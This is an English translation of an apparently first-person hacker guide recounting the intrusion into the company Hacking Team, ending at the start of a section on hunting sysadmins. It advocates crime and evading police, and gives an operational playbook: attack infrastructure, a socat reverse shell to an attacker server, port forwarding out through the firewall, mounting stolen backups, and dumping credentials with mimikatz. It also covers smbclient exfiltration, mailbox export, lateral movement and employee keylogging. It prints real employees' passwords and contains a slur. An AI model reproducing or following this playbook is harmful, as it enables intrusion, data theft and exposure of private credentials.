HackBack 2 translation

1. _ _ _ ____ _ _
2. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
3. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
4. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
5. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
6.  
7. A DIY guide
8.  
9.  
10.  
11. ,-._,-._
12. _,-\ o O_/;
13. / , ` `|
14. | \-.,___, / `
15. \ `-.__/ / ,.\
16. / `-.__.-\` ./ \'
17. / /| ___\ ,/ `\
18. ( ( |.-"` '/\ \ `
19. \ \/ ,, | \ _
20. \| o/o / \.
21. \ , / /
22. ( __`;-;'__`) \\
23. `//'` `||` `\
24. _// || __ _ _ _____ __
25. .-"-._,(__) .(__).-""-. | | | | |_ _| |
26. / \ / \ | | |_| | | | |
27. \ / \ / | | _ | | | |
28. `'-------` `--------'` __| |_| |_| |_| |__
29. #antisec
30.  
31.  
32.  
33. --[ 1 - Introduction ]-----------------------------------------------------------
34.  
35. You'll notice the change in language since the last edition [1]. The English speaking world already has books, talks, guides and information to spare about hacking. In that world, there are much better hackers than myself, but unfortunately they waste their knowledge working for "defense" contractors, intelligence agencies, protecting the banks and corporations and defending the established order. The hacker culture was born in the USA as a counterculture, but the sole remnant of those beginnings is the aesthetics. At least they get to receive a shirt, dye their hair blue, use their hacker aliases and feel like rebels while they work for the system.
36.  
37. Before someone had to break into offices to leak files [2]. You needed a gun to rob a bank. Today you can do it from your bed with a laptop in your hands [3][4]. Like CNT said after the Gamma Group hack: "we'll try to give a step forward with new ways of fighting" [5]. Hacking is a powerful tool, let's learn and fight!
38.  
39. [1] http://pastebin.com/raw.php?i=cRYvK4jb
40. [2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
41. [3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
42. [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
43. [5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group
44.  
45.  
46. --[ 2 - Hacking Team ]----------------------------------------------------------
47.  
48. Hacking Team was a company that helped governments hack and spy journalists, activists, political oponents and other threats to their power [1][2][3][4][5][6][7][8][9][10][11]. And, every now and then, criminals and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the fascist slogan "boia chi molla". "boia chi vende RCS" (executioner who sells RCS) would have been more appropriate. They also claimed to have technology to solve the Tor and darknet "problem".[13]. But since I remain free, I have my doubts about their effectiveness.
49.  
50. [1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
51. [2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
52. [3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
53. [4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
54. [5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
55. [6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
56. [7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
57. [8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
58. [9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
59. [10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
60. [11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
61. [12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
62. [13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web
63.  
64.  
65. --[ 3 - Be careful out there]----------------------------------------------
66.  
67. Our world is upside down. It makes you rich to do bad things and they arrest you for doing good things. Fortunately, thanks to the hard work of people like those of "Tor project" [1], you can avoid getting arrested with a few guidelines:
68.  
69. 1) Encrypt your hard drive [2]
70.  
71. If the police has come to take your computer, it means you have made a lot of mistakes, but better safe than sorry.
72.  
73. 2) Use a virtual machine and route all your traffic through Tor
74. This accomplishes 2 things. First, that all connections are anonymized through the Tor network. Second, keep your personal life and your anonymous life in different computers helps you not mix them accidently.
75.  
76. You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or something custom made [6]. Here [7] is a detailed comparison.
77.  
78. 3) (Optional) Don't connect directly to the Tor network
79.  
80. Tor isn't the end all, be all. It's possible to correlate the hours in which you're connected with the hours in which your hacker alias is active. There have also been successful attacks against the network [8]. You can connect to the Tor network using someone else's wifi. Wifislax [9] is a Linux distro with a lot of wifi hacking tools. Another option is to connect to a VPN or a bridge before Tor, but that is less safe because then they can correlate the hacker's activity with your home network (this was used as evidence against Jeremy Hammond [11]).
81. The reality is that, while Tor isn't perfect, it works pretty well. When I was young and reckless, I did lots of things without protection (I mean hacking) other than Tor, and the police would do all they could to track me down and I never had any problems.
82.  
83. [1] https://www.torproject.org/
84. [2] https://info.securityinabox.org/es/chapter-4
85. [3] https://www.whonix.org/
86. [4] https://tails.boum.org/
87. [5] https://www.qubes-os.org/doc/privacy/torvm/
88. [6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
89. [7] https://www.whonix.org/wiki/Comparison_with_Others
90. [8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
91. [9] http://www.wifislax.com/
92. [10] https://www.torproject.org/docs/bridges.html.en
93. [11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html
94.  
95.  
96. ----[ 3.1 - Infrastructure ]---------------------------------------------------
97.  
98. Don't hack directly with Tor's exit nodes. They are blacklisted, are slow and can't receive connect back shells. Tor serves to protect my anonymity while I connect to the infrastructure I use to hack, which consists of:
99.  
100. 1) Domain names
101.  
102. Useful for command and conquer commands, and for DNS tunneling to guaranteed exits.
103.  
104. 2) Stable servers
105.  
106. Useful for C&C servers, receiving connect back shells, launching attacks and to store the hacked data.
107.  
108. 3) Hacked servers
109.  
110. Useful as pivots to hide the stable servers' IP, and for when I want a fast connection with pivoting. For example, port scanning, scanning the whole Internet, downloading a database with sql injection, etc.
111.  
112. Obviously you have to pay anonymously, with bitcoin for example (if you use it carefully)
113.  
114.  
115. ----[ 3.2 - Attribution ]--------------------------------------------------------
116.  
117. Often there's news that an attack was done by government hackers (APTs), because they always use the same tools, leave the same footprints and even use the same infrastructure (domains, emails etc). They are negligent because they can hack without legal consequences.
118.  
119. I didn't want to help the police work and connect Hacking Team with my hacks and aliases of my regular job as a black hat. Thus I used new servers and domains, registered with new emails and paid for with new bitcoing. Also, I only used public tools and things I write only for this attack and I changed the way of doing some things so as not to leave my regular forensic footprint.
120.  
121.  
122. --[ 4 - Getting information ]---------------------------------------------------
123.  
124. Even though it can be boring, this step is very important, because the bigger the attack surface the easier it is to find a loophole.
125.  
126. ----[ 4.1 - Technical information ]-----------------------------------------------
127.  
128. Some tools and techniques are:
129.  
130. 1) Google
131.  
132. You can find lots of unexpected things with a few well chosen searches. For example, the identity of DPR [1]. The bible of how to use google for hacking is the book "Google Hacking for Penetration Testers". You can also find a brief summary in Spanish in [2].
133.  
134. 2) Subdomain enumeration
135.  
136. Often the principal domain of a company is hosted by a third party, and you'll find big IP ranges of the companyy thanks to subdomains such as mx.company.com, ns1.company.com etc. Also, sometimes there are things that shouldn't be exposed in "hidden" subdomains. Useful tools for finding domains and subdomains include fierce [3], theHarvester [4], y recon-ng [5].
137.  
138. 3) Searches and inverse whois lookups
139.  
140. With an inverse lookup using the whois information of an domain or the IP range of a company you can find other domains and IP ranges of theirs. That I know of, there is no free way to make reverse whois lookups, apart from a google "hack":
141.  
142. "via della moscova 13" site:www.findip-address.com
143. "via della moscova 13" site:domaintools.com
144.  
145. 4) Port scanning and fingerprinting
146.  
147. Unlike the other techniques, this one talks directly with the company's servers. I include it in this section because it isn't an attack, only a way to find more information. The IDS of a company might generate an alert because of the scan, but don't worry because the whole Internet is scanned constantly.
148.  
149. To scan, nmap [6] is needed, and it can fingerprint most of the discovered services. For companies with big IP ranges
150. zmap [7] or masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint websites.
151.  
152. [1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
153. [2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
154. [3] http://ha.ckers.org/fierce/
155. [4] https://github.com/laramies/theHarvester
156. [5] https://bitbucket.org/LaNMaSteR53/recon-ng
157. [6] https://nmap.org/
158. [7] https://zmap.io/
159. [8] https://github.com/robertdavidgraham/masscan
160. [9] http://www.morningstarsecurity.com/research/whatweb
161. [10] http://blindelephant.sourceforge.net/
162.  
163.  
164. ----[ 4.2 - Social information]------------------------------------------------
165.  
166. For social engineering, it is very useful to get information about the employees, their roles, contact information, operating system, browser, plugins, software, etc Some resources:
167.  
168. 1) Google
169.  
170. Here as well, it is the most useful tool.
171.  
172. 2) theHarvester and recon-ng
173.  
174. I've already mentioned them in the former section, but they have much more functionality. They can find information quickly and automatically. It's worth it to read the whole documentation.
175.  
176. 3) LinkedIn
177.  
178. You can find a lot of information about the employees here. The recruiters of the company are more likely to accept your requests.
179.  
180. 4) Data.com
181.  
182. Previously known as jigsaw. It has the contact information of lots of employees.
183.  
184. 5) Archive metadata
185.  
186. You can find a lot of data about the employees and their systems in the metadata of archives published by the company. Useful tools to find archives in the website of the company and extract their metadata include metagoofil [1] and FOCA [2].
187.  
188. [1] https://github.com/laramies/metagoofil
189. [2] https://www.elevenpaths.com/es/labstools/foca-2/index.html
190.  
191.  
192. --[ 5 - Entering the network ]----------------------------------------------------
193.  
194. There are many ways to enter. Even though the method I used for Hacking Team is uncommon and much more laborious than than what is usually needed, I'll talk a little about the more common methods, which I recommend you try first.
195.  
196.  
197. ----[ 5.1 - Social engineering ]-------------------------------------------------
198.  
199. Social engineering, specifically spearphishing, is responsible for most hacks nowadays. For a Spanish introduction, see [1]. For more information in English, see [2] (the third part, "Targeted
200. Attacks"). For funny stories of social engineering of the past generations, see [3]. I didn't want to try spearphishing against Hacking Team, because their business is to help governments spear phish their opponents. Due to this, there was a higher risk that Hacking Team would recognize and investigate the attack.
201.  
202. [1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
203. [2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
204. [3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
205.  
206.  
207. ----[ 5.2 - Buying access ]----------------------------------------------------
208.  
209. Thanks to hardworking russians and their exploit kits, traffic dealers and bot shepherds, lots of companies already have compromised computers inside their networks. Almost every Fortune 500, with their enormous networks, have a few bots in them. However, Hacking Team is a much smaller company, and most employees are infosec experts, so there was little likelihood that they were already compromised.
210.  
211.  
212. ----[ 5.3 - Technical exploitation]-----------------------------------------------
213.  
214. After the Gamma Group hack, I found a way to search for vulnerabilities [1]. Hacking Team has a public IP range:
215. inetnum: 93.62.139.32 - 93.62.139.47
216. descr: HT public subnet
217.  
218. Hacking Team had very little exposed to the Internet. For example, unlike Gamma Group, their customer support site needs a certificate from the client to connect. It had its main website (a Joomla blog in which Joomscan [2] didn't find any major flaws, a mail server, a couple routers, 2 VPN devices and a spam filtering device. Thus I had 3 options: find a 0day in Joomla, find a 0day in postfix or find a 0day in one of the embedded systems. A 0day in an embedded system seemed like the most reachable option, and after weeks of working in reverse engineering, I discovered a remote root exploit. Since the vulnerabilities haven't been patched yet, I won't give any more details. For more information on how to find these vulnerabilities see [3] and [4].
219.  
220. [1] http://pastebin.com/raw.php?i=cRYvK4jb
221. [2] http://sourceforge.net/projects/joomscan/
222. [3] http://www.devttys0.com/
223. [4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A
224.  
225.  
226. --[ 6 - Being prepared]-------------------------------------------------------
227.  
228. I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled many post-exploitation tools for the embedded system. The backdoor is used to protect the exploit. Using the exploit only once and then keep on coming back through the backdoor makes the task of finding and patching the vulnerabilities much harder.
229.  
230. The post-exploitation tools I had prepared were:
231.  
232. 1) busybox
233.  
234. For all the common UNIX utilities that the system didn't have.
235.  
236. 2) nmap
237.  
238. To scan and fingerprint the internal network of Hacking Team.
239.  
240. 3) Responder.py
241.  
242. The most useful tool for attacking Windows networks when you have access to the internal network but no domain user.
243.  
244. 4) Python
245.  
246. To run Responder.py
247.  
248. 5) tcpdump
249.  
250. To sniff traffic.
251.  
252. 6) dsniff
253.  
254. To spy on passwords of weak protocols like ftp, and to do arpspoofing. I wanted to use ettercap, written by the same ALoR and NaGa of Hacking Team, but it was hard to compile it for the system.
255.  
256. 7) socat
257.  
258. For a comfortable shell with pty:
259. my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
260. hacked system: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
261. tcp:my_server:my_port
262.  
263. And for much else, it's a network swiss army knife. See the example section of the documentation.
264.  
265. 8) screen
266.  
267. With the socat pty, it isn't strictly necessary, but I wanted to feel like home in the Hacking Team's networks.
268.  
269. 9) a SOCKS proxy server
270.  
271. To use alongside proxychains to access the internal network with any other program.
272.  
273. 10) tgcd
274.  
275. To forward ports, like the one of the SOCKS server, through the firewall.
276.  
277. [1] https://www.busybox.net/
278. [2] https://nmap.org/
279. [3] https://github.com/SpiderLabs/Responder
280. [4] https://github.com/bendmorris/static-python
281. [5] http://www.tcpdump.org/
282. [6] http://www.monkey.org/~dugsong/dsniff/
283. [7] http://www.dest-unreach.org/socat/
284. [8] https://www.gnu.org/software/screen/
285. [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
286. [10] http://tgcd.sourceforge.net/
287.  
288.  
289. The worst that could happen would be that my backdoor or post-exploitation tools would leave the server unstable and cause an employee to investigate. So, I spent a week testing my exploit, backdoor and post-exploitation tools in the networks of other vulnerable companies before entering Hacking Team's network
290.  
291.  
292. --[ 7 - Watch and listenr ]---------------------------------------------------
293.  
294. Now inside the internal network, I wanted to have a glance and think before taking the next step. I use Responder.py in analysis mode (-A, to listen without poisoning requests), and I do a slow scan with nmap.
295.  
296.  
297. --[ 8 - NoSQL databases ]--------------------------------------------------
298.  
299. NoSQL, or more correctly NoAuthentication, has been a great gift to the hacker community [1]. When I'm worried that they have finally fixed all the authentication omission flaws in MySQL [2][3][4][5], they start using trendy new databases with authentication by design. Nmap finds a few in the internal network of Hacking Team:
300.  
301. 27017/tcp open mongodb MongoDB 2.6.5
302. | mongodb-databases:
303. | ok = 1
304. | totalSizeMb = 47547
305. | totalSize = 49856643072
306. ...
307. |_ version = 2.6.5
308.  
309. 27017/tcp open mongodb MongoDB 2.6.5
310. | mongodb-databases:
311. | ok = 1
312. | totalSizeMb = 31987
313. | totalSize = 33540800512
314. | databases
315. ...
316. |_ version = 2.6.5
317.  
318. They were the databases for RCS testing instances. The audio recorded by RCS is saved in MongoDB with GridFS. The audio folder in the torrent [6] comes from here. They were unwittingly spying on themselves.
319.  
320. [1] https://www.shodan.io/search?query=product%3Amongodb
321. [2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
322. [3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
323. [4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
324. [5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
325. [6] https://ht.transparencytoolkit.org/audio/
326.  
327.  
328. --[ 9 - Crossed wires ]-------------------------------------------------------
329.  
330. Even though it was fun to listen to recordings and watch webcam images of Hacking Team developing their malware, it wasn't very useful. According to their documentation [1], their iSCSI devices should be in a separate network, but nmap finds a few in their subnet 192.168.1.200/24:
331.  
332. Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
333. ...
334. 3260/tcp open iscsi?
335. | iscsi-info:
336. | Target: iqn.2000-01.com.synology:ht-synology.name
337. | Address: 192.168.200.66:3260,0
338. |_ Authentication: No authentication required
339.  
340. Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
341. ...
342. 3260/tcp open iscsi?
343. | iscsi-info:
344. | Target: iqn.2000-01.com.synology:synology-backup.name
345. | Address: 10.0.1.72:3260,0
346. | Address: 192.168.200.72:3260,0
347. |_ Authentication: No authentication required
348.  
349. iSCSI needs a core module, and it was difficult to compile it for the embedded system. I forward the port to mount it from a VPS:
350.  
351. VPS: tgcd -L -p 3260 -q 42838
352. Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
353.  
354. VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1
355.  
356. Now iSCSI finds the domain iqn.2000-01.com.synology but has issues mounting it because it thinks that the address is 92.168.200.72 instead of
357. 127.0.0.1
358.  
359. I solved it like this:
360. iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1
361.  
362. And now after:
363. iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login
364.  
365. ...the file archive appears! We mount it:
366. vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
367.  
368. and find security copies of many virtual machines. The Exchange server seems to be the most interesting one. It's too big to download, but we can mount it remotely and find interesting archives:
369. $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
370. $ fdisk -l /dev/loop0
371. /dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
372.  
373. so the offset is 2048 * 512 = 1048576
374. $ losetup -o 1048576 /dev/loop1 /dev/loop0
375. $ mount -o ro /dev/loop1 /mnt/exchange/
376.  
377. now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
378. we find the hard drive of the virtual machine and we mount it:
379. vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
380. mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
381.  
382. ... and we have finally sorted through the mess and are able to see the archives of the old Exchange server in /mnt/part1
383.  
384. [1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
385.  
386.  
387. --[ 10 - From security copy to domain admin ]---------------------
388.  
389. The thing that interests me the most in the security copy is check if it has a password or hash that I can use to access the actual server. I use pwdump,
390. cachedump, y lsadump [1] with the register's archives. lsadump finds the password of the service account besadmin:
391.  
392. _SC_BlackBerry MDS Connection Service
393. 0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
394. 0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
395. 0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
396.  
397. I use proxychains [2] with the SOCKS server in the embedded system and smbclient [3] to try the password:
398. proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'
399.  
400. It works! The password of besadmin is still valid, and it is a local admin. I use my proxy and psexec_psh from metasploit [4] to get a meterpreter session. Then I switch to a 64 bits process, "load kiwi" [5],
401. "creds_wdigest", and I have a lot more passwords, including that of the domain admin:
402.  
403. HACKINGTEAM BESAdmin bes32678!!!
404. HACKINGTEAM Administrator uu8dd8ndd12!
405. HACKINGTEAM c.pozzi P4ssword <---- go sysadmin!
406. HACKINGTEAM m.romeo ioLK/(90
407. HACKINGTEAM l.guerra 4luc@=.=
408. HACKINGTEAM d.martinez W4tudul3sp
409. HACKINGTEAM g.russo GCBr0s0705!
410. HACKINGTEAM a.scarafile Cd4432996111
411. HACKINGTEAM r.viscardi Ht2015!
412. HACKINGTEAM a.mino A!e$$andra
413. HACKINGTEAM m.bettini Ettore&Bella0314
414. HACKINGTEAM m.luppi Blackou7
415. HACKINGTEAM s.gallucci 1S9i8m4o!
416. HACKINGTEAM d.milan set!dob66
417. HACKINGTEAM w.furlan Blu3.B3rry!
418. HACKINGTEAM d.romualdi Rd13136f@#
419. HACKINGTEAM l.invernizzi L0r3nz0123!
420. HACKINGTEAM e.ciceri 2O2571&2E
421. HACKINGTEAM e.rabe erab@4HT!
422.  
423. [1] https://github.com/Neohapsis/creddump7
424. [2] http://proxychains.sourceforge.net/
425. [3] https://www.samba.org/
426. [4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
427. [5] https://github.com/gentilkiwi/mimikatz
428.  
429.  
430. --[ 11 - Downloading the emails ]-----------------------------------------------
431.  
432. Now that I have the domain admin's password, I have access to the emails, the heart of the company. Since every move I make has a risk of detection, I download the emails before continuing to explore. Powershell makes it easy [1]. Curiously, I found a bug in the date management. After acquiring the emails, it took me a couple more weeks to find the source code and else, so I returned every now and then to download the new emails. The server was Italian, and the dates had the format day/month/year. I use:
433. -ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
434.  
435. with the New-MailboxExportRequest to download the new emails (in this case all the emails since 5 of June). The problem is that it said that the date was wrong if the day was bigger than 12 (I guess this is due to the US using the month first and that there is no month greater than 12). It seems like the Microsoft engineers only tested their software with their own regional configuration.
436. [1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/
437.  
438.  
439. --[ 12 - Downloading archives ]-------------------------------------------------
440.  
441. Now that I am a domain admin, I also started to download the shared resources using my proxy and the option -Tc from smbclient, for example:
442.  
443. proxychains smbclient '//192.168.1.230/FAE DiskStation' \
444. -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
445.  
446. This was how I downloaded the Amministrazione, FAE DiskStation and FileServer folders of the torrent.
447.  
448.  
449. --[ 13 - Introduction to Windows domain hacking ]-----------------------
450.  
451. Before continuing the story of the idiot faggots (translator note: this is slang, and might be poorly translated), I need to teel you something about attacking Windows networks.
452.  
453.  
454. ----[ 13.1 - Lateral movement ]-----------------------------------------------
455.  
456. I'm going to give a brief review of the techniques to propagate inside a Windows netowork. The techniques to run remotely need the password or hash from a local administrator. The most common way to get these credentials is to use mimikatz [1], mainly sekurlsa::logonpasswords and sekurlsa::msv, in the computers where you have administrator privileges. The movement techniques "in situ" also require admin privilege(apart from runas). The most common privilege escalation techniques are PowerUp [2] and bypassuac [3].
457.  
458. [1] https://adsecurity.org/?page_id=1821
459. [2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
460. [3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1
461.  
462.  
463. Remote movement:
464.  
465. 1) psexec
466.  
467. The most simple and tested way of moving in windows networks. You can use
468. psexec [1], winexe [2], psexec_psh de metasploit [3], invoke_psexec from
469. powershell empire [4], or the windows command "sc" [5]. For the metasploit module, powershell empire and pth-winexe [6], you just need the hash without the password. It is the most universal way (works in any computer with port 445 open), but it is also the less cautious. It will show up in the event register like 7045 "Service
470. Control Manager". In my experience no one ever noticed the hack, but sometimes they notice it after the act and it helps the investigators understand what the hacker did.
471.  
472. 2) WMI
473.  
474. The most cautious way. The WMI service is enabled in all windows computers, but, apart from in servers, the firewall blocks it by design. You can use wmiexec.py [7], pth-wmis [6] (here they have a demonstration [8]), invoke_wmi de powershell empire
475. [9], or the windows command wmic [5]. Every single one except wmic only need the hash.
476.  
477. 3) PSRemoting [10]
478.  
479. It is disabled by design, and I don't advice enabling new protocols that aren't necessary. But if the sysadmin has enabled it, it is very convenient, especially if you use powershell for everything (and yes, you should use powershell for almost everything, go change [11] with powershell 5 and windows 10, but today powershell makes it easy to do everything in RAM, evade antivirus and leave few clues).
480.  
481. 4) Programmed tasks
482.  
483. You can run remote programs with schtasks [5]. It works in the same situations as psexec, and also has known traces [12].
484.  
485. 5) GPO
486.  
487. If all these protocols are disabled or blocked by the firewall, since you're the domain admin, you can use GPO to give it a logon script, install an msi, run a programmed task
488. [13], or as we'll see with the computer of Mauro Romeo (sysadmin of Hacking
489. Team), enable WMI and open the firewall through GPO.
490.  
491. [1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
492. [2] https://sourceforge.net/projects/winexe/
493. [3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
494. [4] http://www.powershellempire.com/?page_id=523
495. [5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
496. [6] https://github.com/byt3bl33d3r/pth-toolkit
497. [7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
498. [8] https://www.trustedsec.com/june-2015/no_psexec_needed/
499. [9] http://www.powershellempire.com/?page_id=124
500. [10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
501. [11] https://adsecurity.org/?p=2277
502. [12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
503. [13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py
504.  
505.  
506. In situ movement:
507.  
508. 1) Depersonalizing Tokens
509.  
510. Once you have admin access to a computer, you can use the token of the other users to access resources in the domain. Two tools to do this are incognito [1] and the commands token::* from
511. mimikatz [2].
512.  
513. 2) MS14-068
514.  
515. You can make use of a kerberos authentication fail to generate an admin domain ticket [3][4][5].
516.  
517. 3) Pass the Hash
518.  
519. If you have their has but the user isn't logged in you can use
520. sekurlsa::pth [2] to obtain a user ticket.
521.  
522. 4) Process injection
523. Any RAT can inject itself to another process, for example the command
524. migrate in meterpreter and pupy [6] or psinject [7] in powershell empire.
525. You can inject the process that has the token you want.
526.  
527. 5) runas
528.  
529. This is sometimes very useful because it doesn't require admin privilege. The command is a part of windows, but if you don't have a GUI you can use powershell [8].
530.  
531. [1] https://www.indetectables.net/viewtopic.php?p=211165
532. [2] https://adsecurity.org/?page_id=1821
533. [3] https://github.com/bidord/pykek
534. [4] https://adsecurity.org/?p=676
535. [5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
536. [6] https://github.com/n1nj4sec/pupy
537. [7] http://www.powershellempire.com/?page_id=273
538. [8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1
539.  
540.  
541. ----[ 13.2 - Persistence ]-----------------------------------------------------
542.  
543. Once you gain access, you want to keep it. Really, the persistence alone is a challege for the sons of bitches like those of Hacking Team that want to hack activists and other individuals. To hack companies, you don't need persistence because they never sleep. I always use "persistence" in the style of duqu 2, work in RAM in a couple servers with high uptime percentage. In the hypothetical case that they all reboot at the same time, I have passwords and a golden ticket [1] for backup access. You can read more information about windows persistence mechanisms here
544. [2][3][4]. But to hack companies you don't need it and it increases detection risk.
545.  
546. [1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
547. [2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
548. [3] http://www.hexacorn.com/blog/category/autostart-persistence/
549. [4] https://blog.netspi.com/tag/persistence/
550.  
551.  
552. ----[ 13.3 - Internal reconnaissance ]-------------------------------------------
553.  
554. The best tool nowadays to understand Windows networks is Powerview [1].
555. It's worth it to reed everything written by the author [2], first of all 3], [4], [5], y
556. [6]. Powershell itself is also very powerful [7]. Since there are still many 2003 and 2000 servers without powershell, you also need to learn the old school way [8], with tools like etview.exe [9] or the windows command
557. "net view". Other techniques I like are:
558.  
559. 1) Downloading a list of archive names
560.  
561. With a domain admin account, you can download all the archive names in the network with powerview:
562.  
563. Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
564. select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
565. select fullname | out-file -append files.txt}
566.  
567. Later, you can read it at your own pace and choose which ones you want to download.
568.  
569. 2) Reading emails
570.  
571. Like we have seen before, you can download emails with powershell, and they have lots of useful information.
572.  
573. 3) Reading sharepoint
574.  
575. Another place where companies have important information. You can download it with powershell [10].
576.  
577. 4) Active Directory [11]
578.  
579. It has lots of useful information about users and computers. Without being domain admin, you can already find lots of information with powerview and other tools [12]. After gaining domain admin access you should export all the data from AD with csvde or another tool.
580.  
581. 5) Spying on the employees
582.  
583. One of my favourite pastimes is to hunt sysadmins. Spying on Christan Pozzi (sysadmin of Hacking Team) I gained access to the Nagios server which gave me access to the sviluppo network (development network in RCS source code). With a simple combo of Get-Keystrokes and
584. Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang [14], and
585. GPO, you can spy on any employee or even the whole domain.
586.  
587. [1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
588. [2] http://www.harmj0y.net/blog/tag/powerview/
589. [3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
590. [4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
591. [5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
592. [6] http://www.slideshare.net/harmj0y/i-have-the-powerview
593. [7] https://adsecurity.org/?p=2535
594. [8] https://www.youtube.com/watch?v=rpwrKhgMd7E
595. [9] https://github.com/mubix/netview
596. [10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
597. [11] https://adsecurity.org/?page_id=41
598. [12] http://www.darkoperator.com/?tag=Active+Directory
599. [13] https://github.com/PowerShellMafia/PowerSploit
600. [14] https://github.com/samratashok/nishang
601.  
602.  
603. --[ 14 - Hunting Sysadmins ]----------------------------------------------------
604.  
